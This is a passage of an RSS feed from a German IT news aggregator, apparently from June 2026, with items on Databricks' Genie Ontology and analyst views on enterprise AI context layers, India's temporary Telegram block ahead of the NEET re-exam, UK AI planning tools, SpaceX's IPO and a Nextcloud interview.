<p>Rather than treating all sources equally, it weighs factors including who created the information, how widely it is used, its links to certified datasets and assets, and how recently it was updated before determining which answer an AI agent should rely on, Databricks CEO <a href="https://www.linkedin.com/in/alighodsi/" target="_blank" rel="noreferrer noopener">Ali Ghodsi</a> said during his keynote late on Tuesday while explaining the new offering.</p>



<p>Organizations can also upload their own business definitions or ontologies to Genie Ontology via Databricks’ existing Unity Catalog Semantics platform, Ghodsi added.</p>



<h2 class="wp-block-heading">Ontology promises consistency, but readiness remains a hurdle</h2>



<p>For CIOs, a unified context layer, such as Genie Ontology, will materially improve consistency, trust, and governance for enterprise AI deployments, according to analysts.</p>



<p>“One definition feeding every agent means you stop getting three different answers to the same question,” said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="noreferrer noopener">Michael Leone</a>, principal analyst at Moor Insights and Strategy.</p>



<p>“Older approaches, such as RAG and vector search, just pull back whatever looks similar to your question, and they don’t actually understand your business. An ontology gives the agent the meaning a catalog can’t, what your terms mean, and which source to trust,” Leone added.</p>



<p>That improvement in consistency, according to <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/">Ashish Chaturvedi</a>, leader of executive research at HFS Research, could also improve trust, which remains one of the most critical barriers to AI adoption.</p>



<p>“The single biggest barrier to enterprise AI adoption is that decision-makers don’t trust AI outputs enough to act on them without checking. An ontology that grounds answers in governed business definitions, with lineage back to source, directly attacks that trust deficit,” Chaturvedi said.</p>



<p>Alternatively, Leone was more cautious about the trust argument: “It’s a promising idea, but it still has to prove itself before I’d lean on it for anything that matters.”</p>



<p>Echoing Leone, HyperFRAME Research’s practice leader of AI stack <a href="https://www.linkedin.com/m/in/slwalter">Stephanie Walter</a> pointed out that ontologies have a missing link, and that is verification: “Ontologies can improve context, but they do not guarantee the answer is correct. An agent can still pull incomplete data, apply the wrong logic, skip rows, misunderstand a workflow, or take the wrong action.”</p>



<p>That verification gap becomes even more critical, according to Leone, because most enterprises don’t have the data and governance readiness required to implement an ontology layer for AI deployments: “If your data and governance aren’t already in order, this just speeds up your existing mess.”</p>



<p>Seconding Leone, Walter pointed out that an ontology cannot fix messy definitions, poor lineage, weak ownership, or fragmented permissions on its own.</p>



<p>Additionally, the analyst pointed out that the hard part for CIOs is not creating an ontology once but keeping it accurate as the business changes: “Enterprises will need clear data ownership, metric ownership, domain expertise, governance processes, and a way to resolve conflicting definitions.”</p>



<p>“Otherwise, the ontology becomes another stale metadata project with a more sophisticated name,” Walter added.</p>



<h2 class="wp-block-heading">A growing risk of CIO confusion</h2>



<p>Beyond data and governance readiness, CIOs also face a growing risk of confusion in the wake of several technology vendors pursuing approaches, similar to Genie Ontology, to ground enterprise AI in a business context, according to analysts.</p>



<p>Over the past year, Snowflake, Microsoft, and others have introduced some form of ontology, semantic, and context-layer offerings, but the problem is in how these offerings are named, Leone said.</p>



<p>“Everyone slapped a different name on basically the same idea. It slows people down as it creates confusion,” Leone noted.</p>



<p>That confusion could also backfire on Databricks and other vendors, according to <a href="https://www.linkedin.com/in/bhupendrachopra/" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, cofounder and CRO of IT consulting firm Kanerika: “While the marketing has converged around context-building offerings, most enterprises will choose the platform where their data already resides.”</p>



<p>HFS Research’s Chaturvedi doubled down on that view, saying CIOs should resist evaluating ontology offerings in isolation and asked them to stick to the mantra of context layer follows data gravity: “If your data lives in Databricks, Genie Ontology is your path. If it’s in Snowflake, <a href="https://www.cio.com/article/4180170/snowflakes-horizon-context-aims-to-give-ai-agents-a-common-understanding-of-the-business.html">Horizon Context</a> is. If you’re a Microsoft shop, the <a href="https://www.infoworld.com/article/4093181/microsoft-fabric-iq-adds-semantic-intelligence-layer-to-fabric.html">IQ</a> family is.”</p>



<p>Additionally, Chaturvedi urged CIOs to look beyond functionality and assess how open and portable these offerings are, particularly in multi-platform environments where business definitions may need to move across data <a href="https://www.infoworld.com/article/2334907/review-databricks-lakehouse-platform.html">lakehouses</a>, analytics tools, and AI platforms.</p>



<p>This is where Chaturvedi sees Snowflake differentiating itself from rivals, with its focus on open semantic interoperability aimed at reducing the risk of semantic lock-in as enterprises evolve their data and analytics stacks.</p>



<h2 class="wp-block-heading">The battle for the AI control plane</h2>



<p>Snowflake’s efforts to differentiate itself, though, analysts pointed out, at least for CIOs, draw attention to a larger race among vendors, including Databricks, to become the control plane for enterprise AI.</p>



<p>While Snowflake is attempting to position itself as an AI control layer through a combination of <a href="https://www.infoworld.com/article/3603375/snowflake-bares-its-agentic-ai-plans-by-showcasing-its-intelligence-platform.html">Snowflake Intelligence</a>, Horizon Catalog, and its push for open semantic interoperability, Microsoft is embedding business context and governance across its Copilot, Fabric, and broader AI stack through offerings such as Work IQ, Fabric IQ, and Foundry IQ, Chaturvedi said.</p>



<p>Databricks’ Genie Ontology, too, is part of a similar strategy, Chaturvedi pointed out, urging CIOs to view the offering in the context of the company’s wider effort to position its lakehouse platform as the foundation on which enterprise AI agents are built, governed, and eventually deployed.</p>



<p>“It’s absolutely a control-plane play. When you connect the dots across everything Databricks has announced at this summit, including <a href="https://www.infoworld.com/article/4185622/databricks-pitches-ltap-as-a-new-foundation-for-agentic-applications.html">LTAP</a>, <a href="https://www.infoworld.com/article/4184076/databricks-opensharing-targets-the-integration-tax-of-enterprise-ai.html">OpenSharing</a>, and Genie Ontology, you see a single place where enterprise data, governance, business semantics, and agent execution all converge,” Chaturvedi added.</p>



<p>Further, the analyst noted that the control-plane strategy reflects Ghodsi’s broader vision that data platforms could evolve into what the CEO describes as an “agentic system of record” — an authoritative source that AI agents read from, reason over, and act through.</p>



<p>The concept mirrors earlier platform shifts, Chaturvedi said, where ERP systems became the system of record for business transactions and data warehouses became the system of record for analytics.</p>



<p>The next battle, the analyst said, is over which platform becomes the system of record for enterprise AI agents.</p>



<p>Moor Insights and Strategy’s Leone agreed that data platforms are well-positioned to compete for that role because they already own the data, governance controls, lineage, and permissions that agents require to operate safely at scale.</p>



<p>Still, analysts cautioned that context alone will not determine which vendor comes out on top.</p>



<p>“The next enterprise AI battleground is not just context. It is verifiable execution,” Walter said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[From RAG to ontology: Databricks bets on context as the key to trusted AI agents]]></title>
<description><![CDATA[First came vector databases, then RAG. Now, the next frontier in enterprise AI is taking shape: context layers that give autonomous agents a shared understanding of the business, a vision Databricks is advancing with Genie Ontology.



Currently in preview, Genie Ontology automatically extracts b...]]></description>
<link>https://tsecurity.de/de/3604511/it-nachrichten/from-rag-to-ontology-databricks-bets-on-context-as-the-key-to-trusted-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604511/it-nachrichten/from-rag-to-ontology-databricks-bets-on-context-as-the-key-to-trusted-ai-agents/</guid>
<pubDate>Wed, 17 Jun 2026 13:03:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>First came vector databases, then RAG. Now, the next frontier in enterprise AI is taking shape: context layers that give autonomous agents a shared understanding of the business, a vision Databricks is advancing with Genie Ontology.</p>



<p>Currently in preview, Genie Ontology automatically extracts business context from enterprise data, dashboards, queries, pipelines, documents, and applications and organizes it into a living graph that AI agents can use to understand how an organization operates.</p>



<p>Showcased at the company’s Data + AI Summit, Genie Ontology uses a ranking system inspired by <a href="http://infolab.stanford.edu/~backrub/google.html" target="_blank" rel="nofollow">Google’s PageRank</a> to identify the most authoritative business definitions within an organization.</p>



<p>Rather than treating all sources equally, it weighs factors including who created the information, how widely it is used, its links to certified datasets and assets, and how recently it was updated before determining which answer an AI agent should rely on, Databricks CEO <a href="https://www.linkedin.com/in/alighodsi/" target="_blank" rel="nofollow">Ali Ghodsi</a> said during his keynote late on Tuesday while explaining the new offering.</p>



<p>Organizations can also upload their own business definitions or ontologies to Genie Ontology via Databricks’ existing Unity Catalog Semantics platform, Ghodsi added.</p>



<h2 class="wp-block-heading">Ontology promises consistency, but readiness remains a hurdle</h2>



<p>For CIOs, a unified context layer, such as Genie Ontology, will materially improve consistency, trust, and governance for enterprise AI deployments, according to analysts.</p>



<p>“One definition feeding every agent means you stop getting three different answers to the same question,” said <a href="https://moorinsightsstrategy.com/team/mike-leone/" target="_blank" rel="nofollow">Michael Leone</a>, principal analyst at Moor Insights and Strategy.</p>



<p>“Older approaches, such as RAG and vector search, just pull back whatever looks similar to your question, and they don’t actually understand your business. An ontology gives the agent the meaning a catalog can’t, what your terms mean, and which source to trust,” Leone added.</p>



<p>That improvement in consistency, according to <a href="https://www.hfsresearch.com/team/ashish-chaturvedi/" rel="nofollow">Ashish Chaturvedi</a>, leader of executive research at HFS Research, could also improve trust, which remains one of the most critical barriers to AI adoption.</p>



<p>“The single biggest barrier to enterprise AI adoption is that decision-makers don’t trust AI outputs enough to act on them without checking. An ontology that grounds answers in governed business definitions, with lineage back to source, directly attacks that trust deficit,” Chaturvedi said.</p>



<p>Alternatively, Leone was more cautious about the trust argument: “It’s a promising idea, but it still has to prove itself before I’d lean on it for anything that matters.”</p>



<p>Echoing Leone, HyperFRAME Research’s practice leader of AI stack <a href="https://www.linkedin.com/m/in/slwalter" rel="nofollow">Stephanie Walter</a> pointed out that ontologies have a missing link, and that is verification: “Ontologies can improve context, but they do not guarantee the answer is correct. An agent can still pull incomplete data, apply the wrong logic, skip rows, misunderstand a workflow, or take the wrong action.”</p>



<p>That verification gap becomes even more critical, according to Leone, because most enterprises don’t have the data and governance readiness required to implement an ontology layer for AI deployments: “If your data and governance aren’t already in order, this just speeds up your existing mess.”</p>



<p>Seconding Leone, Walter pointed out that an ontology cannot fix messy definitions, poor lineage, weak ownership, or fragmented permissions on its own.</p>



<p>Additionally, the analyst pointed out that the hard part for CIOs is not creating an ontology once but keeping it accurate as the business changes: “Enterprises will need clear data ownership, metric ownership, domain expertise, governance processes, and a way to resolve conflicting definitions.”</p>



<p>“Otherwise, the ontology becomes another stale metadata project with a more sophisticated name,” Walter added.</p>



<h2 class="wp-block-heading">A growing risk of CIO confusion</h2>



<p>Beyond data and governance readiness, CIOs also face a growing risk of confusion in the wake of several technology vendors pursuing approaches, similar to Genie Ontology, to ground enterprise AI in a business context, according to analysts.</p>



<p>Over the past year, Snowflake, Microsoft, and others have introduced some form of ontology, semantic, and context-layer offerings, but the problem is in how these offerings are named, Leone said.</p>



<p>“Everyone slapped a different name on basically the same idea. It slows people down as it creates confusion,” Leone noted.</p>



<p>That confusion could also backfire on Databricks and other vendors, according to <a href="https://www.linkedin.com/in/bhupendrachopra/" target="_blank" rel="nofollow">Bhupendra Chopra</a>, cofounder and CRO of IT consulting firm Kanerika: “While the marketing has converged around context-building offerings, most enterprises will choose the platform where their data already resides.”</p>



<p>HFS Research’s Chaturvedi doubled down on that view, saying CIOs should resist evaluating ontology offerings in isolation and asked them to stick to the mantra of context layer follows data gravity: “If your data lives in Databricks, Genie Ontology is your path. If it’s in Snowflake, <a href="https://www.cio.com/article/4180170/snowflakes-horizon-context-aims-to-give-ai-agents-a-common-understanding-of-the-business.html">Horizon Context</a> is. If you’re a Microsoft shop, the <a href="https://www.infoworld.com/article/4093181/microsoft-fabric-iq-adds-semantic-intelligence-layer-to-fabric.html">IQ</a> family is.”</p>



<p>Additionally, Chaturvedi urged CIOs to look beyond functionality and assess how open and portable these offerings are, particularly in multi-platform environments where business definitions may need to move across data <a href="https://www.infoworld.com/article/2334907/review-databricks-lakehouse-platform.html">lakehouses</a>, analytics tools, and AI platforms.</p>



<p>This is where Chaturvedi sees Snowflake differentiating itself from rivals, with its focus on open semantic interoperability aimed at reducing the risk of semantic lock-in as enterprises evolve their data and analytics stacks.</p>



<h2 class="wp-block-heading">The battle for the AI control plane</h2>



<p>Snowflake’s efforts to differentiate itself, though, analysts pointed out, at least for CIOs, draw attention to a larger race among vendors, including Databricks, to become the control plane for enterprise AI.</p>



<p>While Snowflake is attempting to position itself as an AI control layer through a combination of <a href="https://www.infoworld.com/article/3603375/snowflake-bares-its-agentic-ai-plans-by-showcasing-its-intelligence-platform.html">Snowflake Intelligence</a>, Horizon Catalog, and its push for open semantic interoperability, Microsoft is embedding business context and governance across its Copilot, Fabric, and broader AI stack through offerings such as Work IQ, Fabric IQ, and Foundry IQ, Chaturvedi said.</p>



<p>Databricks’ Genie Ontology, too, is part of a similar strategy, Chaturvedi pointed out, urging CIOs to view the offering in the context of the company’s wider effort to position its lakehouse platform as the foundation on which enterprise AI agents are built, governed, and eventually deployed.</p>



<p>“It’s absolutely a control-plane play. When you connect the dots across everything Databricks has announced at this summit, including <a href="https://www.infoworld.com/article/4185622/databricks-pitches-ltap-as-a-new-foundation-for-agentic-applications.html">LTAP</a>, <a href="https://www.infoworld.com/article/4184076/databricks-opensharing-targets-the-integration-tax-of-enterprise-ai.html">OpenSharing</a>, and Genie Ontology, you see a single place where enterprise data, governance, business semantics, and agent execution all converge,” Chaturvedi added.</p>



<p>Further, the analyst noted that the control-plane strategy reflects Ghodsi’s broader vision that data platforms could evolve into what the CEO describes as an “agentic system of record” — an authoritative source that AI agents read from, reason over, and act through.</p>



<p>The concept mirrors earlier platform shifts, Chaturvedi said, where ERP systems became the system of record for business transactions and data warehouses became the system of record for analytics.</p>



<p>The next battle, the analyst said, is over which platform becomes the system of record for enterprise AI agents.</p>



<p>Moor Insights and Strategy’s Leone agreed that data platforms are well-positioned to compete for that role because they already own the data, governance controls, lineage, and permissions that agents require to operate safely at scale.</p>



<p>Still, analysts cautioned that context alone will not determine which vendor comes out on top.</p>



<p>“The next enterprise AI battleground is not just context. It is verifiable execution,” Walter said.</p>



<p><em>The article originally appeared on <a href="https://www.infoworld.com/article/4186146/from-rag-to-ontology-databricks-bets-on-context-as-the-key-to-trusted-ai-agents.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why India Temporarily Blocked Telegram Ahead of NEET UG 2026]]></title>
<description><![CDATA[India has temporarily enforced a Telegram Ban in India ahead of the NEET UG 2026 Re-examination, citing concerns that the platform could be used by organized cheating networks to target candidates. The restriction, recommended by the National Testing Agency (NTA) and implemented through direction...]]></description>
<link>https://tsecurity.de/de/3604210/it-security-nachrichten/why-india-temporarily-blocked-telegram-ahead-of-neet-ug-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604210/it-security-nachrichten/why-india-temporarily-blocked-telegram-ahead-of-neet-ug-2026/</guid>
<pubDate>Wed, 17 Jun 2026 11:23:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Telegram Ban in India" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Why India Temporarily Blocked Telegram Ahead of NEET UG 2026 1"></p>India has temporarily enforced a Telegram Ban in India ahead of the NEET UG 2026 Re-examination, citing concerns that the platform could be used by organized cheating networks to target candidates. The restriction, recommended by the National Testing Agency (NTA) and implemented through directions issued by the <a href="https://thecyberexpress.com/cybersecurity-measures-at-meity-summit/" target="_blank" rel="noopener">Ministry of Electronics and Information Technology</a> (MeitY), will remain in effect until June 22, 2026.

According to the NTA, the measure is intended to support the safe and secure conduct of the NEET re-examination scheduled for June 21, 2026, and prevent the spread of fraudulent claims related to exam papers.
<h3><strong>Telegram Ban in India Limited to Examination Period</strong></h3>
The temporary Telegram Ban in India has been imposed under Section 69A of the Information Technology Act, 2000. The restriction is limited to a defined period covering the examination day and its immediate aftermath.

In addition to restricting access to the platform, authorities have directed Telegram to disable its Telegram Message Editing Feature in India until June 30, 2026. The NTA stated that the feature has been misused in the past to create misleading claims of Paper Leak incidents after examinations had already taken place.

The agency <a href="https://nta.ac.in/Download/Notice/Notice_20260616120254.pdf" target="_blank" rel="nofollow noopener">noted</a> that the temporary measures were adopted after other enforcement actions had already been pursued and were intended to address concerns during the examination window with the minimum restriction considered necessary.

<img class="aligncenter wp-image-112771 size-full" src="https://thecyberexpress.com/wp-content/uploads/Telegram-Ban-in-India-Ahead-of-NEET-UG-2026-e1781685804675.webp" alt="Telegram Ban in India Ahead of NEET UG 2026" width="600" height="400">
<h3><strong>Coordinated Action Against NEET UG 2026 Exam Fraud Networks</strong></h3>
The NTA credited the Indian <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Cyber Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28734">Cyber Crime</a> Coordination Centre (I4C), operating under the Ministry of Home Affairs, for coordinating action against channels and groups allegedly involved in Exam Fraud targeting NEET candidates.

According to the agency, I4C worked with state law enforcement agencies and MeitY to identify and remove numerous Telegram channels, groups, and bots that openly advertised access to examination papers or related services.

Authorities said several channels used names such as "PAPER LEAKED NEET," "Re-NEET 2026," and similar variations while demanding payments from candidates and their families in exchange for purported access to examination material.

The NTA reiterated that no examination paper was available outside the secured examination process and described such offers as fraudulent.
<h3><strong>Why the Message Editing Feature Was Restricted</strong></h3>
The direction related to the Telegram Message Editing Feature addresses concerns about fabricated evidence of examination leaks.

According to the NTA, Telegram administrators can edit previously published messages while retaining the original posting timestamp. Authorities stated that this capability has been used in multiple examinations to replace earlier content with actual question papers after an exam had concluded, creating the appearance that the material had been shared before the test.

The temporary restriction on editing existing messages is intended to prevent the creation and circulation of such misleading content during the post-examination period.
<h3><strong>Law Enforcement Investigations Continue</strong></h3>
Authorities also pointed to ongoing enforcement actions in several states. The Bihar Police Economic Offences Unit issued a public advisory on June 9, warning candidates against fraudulent claims of pre-examination paper access circulating through Telegram and other online platforms.

Separately, the Ahmedabad City <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="Cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28736">Cyber</a> Crime Branch arrested members of an alleged inter-state cyber fraud network accused of operating multiple Telegram channels linked to the same scheme. Investigators reported documented transactions worth approximately ₹1.5 crore and outreach to nearly 1,000 mobile numbers within a month.
<h3><strong>NTA Reassures Candidates</strong></h3>
The NTA acknowledged that the restriction affects users who rely on <a href="https://thecyberexpress.com/phishing-telegram-bots-steal-credentials/" target="_blank" rel="noopener">Telegram</a> for educational, professional, and personal communication. However, the agency emphasized that the measure is temporary and focused on protecting the integrity of the NEET UG 2026 Re-examination.

The examination will proceed as scheduled on June 21. The agency urged candidates to ignore unverified information circulating online and rely only on official NTA communication channels for updates.

Officials also encouraged students and parents to report suspicious activities through the national <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28735">cybercrime</a> reporting mechanisms and remain cautious of claims related to examination papers circulating on any platform.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Cloud Summit: UK to deploy AI-powered planning system]]></title>
<description><![CDATA[The UK planning system is being reworked with artificial intelligence and computer vision to provide data in a consistent format]]></description>
<link>https://tsecurity.de/de/3604133/it-nachrichten/google-cloud-summit-uk-to-deploy-ai-powered-planning-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604133/it-nachrichten/google-cloud-summit-uk-to-deploy-ai-powered-planning-system/</guid>
<pubDate>Wed, 17 Jun 2026 11:03:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The UK planning system is being reworked with artificial intelligence and computer vision to provide data in a consistent format]]></content:encoded>
</item>
<item>
<title><![CDATA[데이터브릭스, 기업 업무 자동화 지원 AI 플랫폼 ‘지니 원’ 공개]]></title>
<description><![CDATA[지니 원은 데이터브릭스의 AI 제품군인 ‘지니(Genie)’의 일부로, 기업 데이터를 기반으로 답변 생성과 업무 수행을 지원한다.



데이터브릭스에 따르면, 지니의 핵심은 조직 내 데이터, 문서, 애플리케이션, 사람 등에서 축적되는 지식을 연결하는 ‘지니 온톨로지(Genie Ontology)’다. 데이터브릭스는 이를 통해 데이터브릭스 환경은 물론 파일, 채팅, 회의, 티켓 등 다양한 업무 시스템에서 비즈니스 맥락을 자동으로 수집·업데이트한다고 설명했다.



이에 따라 AI는 추론에 의존하기보다 거버넌스가 적용된 데이터를 기...]]></description>
<link>https://tsecurity.de/de/3603979/it-nachrichten/ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603979/it-nachrichten/ai/</guid>
<pubDate>Wed, 17 Jun 2026 10:03:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>지니 원은 데이터브릭스의 AI 제품군인 ‘지니(Genie)’의 일부로, 기업 데이터를 기반으로 답변 생성과 업무 수행을 지원한다.</p>



<p>데이터브릭스에 따르면, 지니의 핵심은 조직 내 데이터, 문서, 애플리케이션, 사람 등에서 축적되는 지식을 연결하는 ‘지니 온톨로지(Genie Ontology)’다. 데이터브릭스는 이를 통해 데이터브릭스 환경은 물론 파일, 채팅, 회의, 티켓 등 다양한 업무 시스템에서 비즈니스 맥락을 자동으로 수집·업데이트한다고 설명했다.</p>



<p>이에 따라 AI는 추론에 의존하기보다 거버넌스가 적용된 데이터를 기반으로 답변을 생성하고 업무를 수행할 수 있어 정확성을 높이고 비용과 지연 시간을 줄일 수 있다는 것이 회사 측 설명이다.</p>



<p>데이터브릭스 공동설립자 겸 CEO 알리 고드시는 “많은 기업용 AI가 충분한 맥락 없이 답변을 생성하고 있다”라며 “지니 온톨로리는 다양한 데이터에서 지속적으로 맥락을 학습해 더 정확하고 빠른 답변을 제공한다”라고 밝혔다.</p>



<p>지니 원은 웹, iOS, 안드로이드에서 사용할 수 있다. 기존 지니가 데이터브릭스 내 데이터 분석에 초점을 맞췄다면, 지니 원은 외부 애플리케이션과 데이터까지 연결 범위를 확대했다. 사용자는 문서와 보고서 생성, 업무 자동화, 알림 설정, 데이터 시각화 등의 기능을 활용할 수 있다.</p>



<p>함께 공개된 지니 에이전트(Genie Agents)는 사용자가 만든 대화를 재사용 가능한 AI 에이전트로 저장해 조직 내에서 공유할 수 있도록 지원한다. 지니 앱 빌더(Genie App Builder)는 기업용 애플리케이션을 개발할 수 있는 관리형 개발 환경으로, 유니티 카탈로그(Unity Catalog) 기반의 권한 관리 기능을 제공한다.</p>



<p>이와 함께 데이터 엔지니어링과 머신러닝 업무를 지원하는 ‘지니 코드(Genie Code)’, 데이터 및 AI 자산을 모니터링하는 운영 자동화 기능 ‘지니 제로옵스(Genie ZeroOps)’도 공개됐다.</p>



<p>지니 원, 지니 에이전트, 지니 코드는 현재 정식 출시됐다. 지니 앱 빌더와 지니 제로옵스는 데이터+AI 서밋(Data + AI Summit) 이후 비공개 프리뷰로 제공될 예정이다. 데이터브릭스는 사용자당 월 최대 10달러(약 1만 4,000원)의 무료 크레딧을 제공하며, 실제 사용량에 대해서만 비용을 부과한다고 밝혔다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk’s unprecendented accumulation of wealth]]></title>
<description><![CDATA[IPO mints Musk as world’s first trillionaire – now SpaceX is public, it will be harder than ever not to have a stake in its future Hi and welcome to TechScape. Nick Robins-Early here, US tech and power reporter at the Guardian. I’m filling in for your usual host Blake Montgomery, who is out this ...]]></description>
<link>https://tsecurity.de/de/3603936/it-nachrichten/elon-musks-unprecendented-accumulation-of-wealth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603936/it-nachrichten/elon-musks-unprecendented-accumulation-of-wealth/</guid>
<pubDate>Wed, 17 Jun 2026 09:33:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>IPO mints Musk as world’s first trillionaire – now SpaceX is public, it will be harder than ever not to have a stake in its future </p><p>Hi and welcome to TechScape. Nick Robins-Early here, US tech and power reporter at the Guardian. I’m filling in for your usual host Blake Montgomery, who is out this week on vacation.</p><p>Today, we’ll be talking about the <a href="https://www.theguardian.com/science/2026/jun/12/spacex-stock-price-ipo-spcx">historic SpaceX IPO</a> and the US government’s <a href="https://www.theguardian.com/technology/2026/jun/13/anthropic-disable-advanced-ai-models-us-government-order">surprise order to limit</a> the use of Anthropic’s most advanced AI model over cybersecurity concerns. I’ll also share a dispatch from Web Summit Rio, South America’s largest tech event.</p><p><a href="https://www.theguardian.com/science/2026/jun/12/spacex-stock-price-ipo-spcx">SpaceX makes largest ever stock market debut, minting Musk as a trillionaire</a></p><p><a href="https://www.theguardian.com/business/2026/jun/12/ai-ipos-stock-market">After SpaceX’s huge IPO, Americans’ financial future will be bound to AI</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/12/elon-musk-spacex-net-worth">How much money did Elon Musk make in SpaceX’s stock market debut?</a></p> <a href="https://www.theguardian.com/technology/2026/jun/16/elon-musk-techscape">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scaling the UK government’s AI vision]]></title>
<description><![CDATA[Today at the Google Cloud Summit London, we discussed why Google Cloud is the foundation for the UK government’s Augmented Planning Decisions tool.]]></description>
<link>https://tsecurity.de/de/3603854/it-nachrichten/scaling-the-uk-governments-ai-vision/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603854/it-nachrichten/scaling-the-uk-governments-ai-vision/</guid>
<pubDate>Wed, 17 Jun 2026 09:03:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/GoogleLondon_2_1.max-600x600.format-webp.webp">Today at the Google Cloud Summit London, we discussed why Google Cloud is the foundation for the UK government’s Augmented Planning Decisions tool.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nextcloud-CEO: Open Source verlässt die „Nerd-Nische“]]></title>
<description><![CDATA[width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px">Nextcloud-CEO Frank KarlitschekNextcloud



Angesichts der politischen und handelspolitischen Spannungen ist die digitale Souveränität – einst ein eher randständiges Thema – zu einer der wichtigsten Prioritäten für europäis...]]></description>
<link>https://tsecurity.de/de/3603568/it-security-nachrichten/nextcloud-ceo-open-source-verlaesst-die-nerd-nische/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603568/it-security-nachrichten/nextcloud-ceo-open-source-verlaesst-die-nerd-nische/</guid>
<pubDate>Wed, 17 Jun 2026 06:06:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"> width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Nextcloud-CEO Frank Karlitschek</figcaption></figure><p class="imageCredit">Nextcloud</p></div>



<p>Angesichts der politischen und handelspolitischen Spannungen ist die digitale Souveränität – einst ein eher randständiges Thema – zu einer der wichtigsten Prioritäten für europäische Organisationen geworden. Der verstärkte Einsatz von Open-Source-Software ist dabei ein wesentlicher Teil der Lösung, da er eine Alternative zu proprietären Plattformen einer Handvoll großer US-Anbieter bietet.</p>



<p>Diese Ansicht vertritt Frank Karlitschek, CEO von Nextcloud, dem deutschen Softwareunternehmen, das sich als Open-Source-Alternative zu Software-Suiten von Microsoft und Google positioniert.</p>



